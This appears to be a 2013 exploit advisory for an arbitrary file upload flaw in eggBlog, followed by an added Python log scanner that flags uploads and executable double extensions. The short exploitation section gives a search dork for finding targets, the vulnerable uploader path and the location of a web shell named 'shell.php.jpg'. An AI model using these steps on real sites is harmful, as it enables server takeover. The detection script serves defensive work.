# Exploit Title: eggBlog Arbitrary File Upload Vulnerability
# Google Dork: "powered by eggBlog.net"
# Date: 28/04/2013
# Exploit Author: Pokk3rs
# Vendor Homepage: http://eggblog.net/
# Software Link: http://sourceforge.net/projects/eggblog/files/eggBlog%204/v4.1.2/
# Tested on: Win8 Pro x64

Expl0itation

1 - Google Dork: "powered by eggBlog.net"
2 - http://server/[path]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
3 - http://server/[path]/photos/uploads/shell.php.jpg
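
A defender-side check for the two request patterns listed above, as an added example that is not part of the original advisory: it flags POSTs to the image-library uploader and requests under photos/uploads/ whose file name carries an executable extension before the final one. The log lines, the extension list and the assumption that uploads arrive as POST are constructed for illustration.

```python
import re

# Extensions a web server may hand to an interpreter (assumed list; match it to your server config).
EXEC_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "pl", "cgi", "asp", "aspx", "jsp"}

# Paths taken from the advisory, relative to the blog's install path.
UPLOADER = "/_lib/openwysiwyg/addons/imagelibrary/insert_image.php"
UPLOAD_DIR = "/photos/uploads/"

# Request portion of a Common Log Format line: "METHOD path HTTP/x.y" status
REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def has_exec_extension(filename):
    """True if any dot-separated part after the base name is an executable extension."""
    parts = filename.lower().split(".")
    return any(p in EXEC_EXTS for p in parts[1:])

def classify(line):
    """Return a tag for a suspicious access-log line, or None."""
    m = REQ.search(line)
    if not m:
        return None
    path = m.group("path").split("?", 1)[0]  # drop the query string
    # Assumption: file uploads reach the uploader as POST requests.
    if path.endswith(UPLOADER) and m.group("method") == "POST":
        return "uploader-post"
    if UPLOAD_DIR in path:
        name = path.rsplit("/", 1)[1]
        if has_exec_extension(name):
            return "exec-ext-in-uploads"
    return None

def scan(lines):
    """Return (line_number, tag) for every flagged line."""
    return [(i, tag) for i, line in enumerate(lines, 1) if (tag := classify(line))]

# Constructed sample log (documentation IP ranges, hypothetical /blog install path).
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Apr/2013:10:00:01 +0000] "GET /blog/index.php HTTP/1.1" 200 5120',
    '203.0.113.5 - - [28/Apr/2013:10:00:07 +0000] "POST /blog/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg= HTTP/1.1" 200 812',
    '203.0.113.5 - - [28/Apr/2013:10:00:09 +0000] "GET /blog/photos/uploads/shell.php.jpg HTTP/1.1" 200 40',
    '198.51.100.7 - - [28/Apr/2013:10:02:00 +0000] "GET /blog/photos/uploads/holiday.jpg HTTP/1.1" 200 88211',
]

if __name__ == "__main__":
    for lineno, tag in scan(SAMPLE_LOG):
        print(lineno, tag)
```

The same has_exec_extension check can be run over a directory listing of photos/uploads/ to find files already on disk.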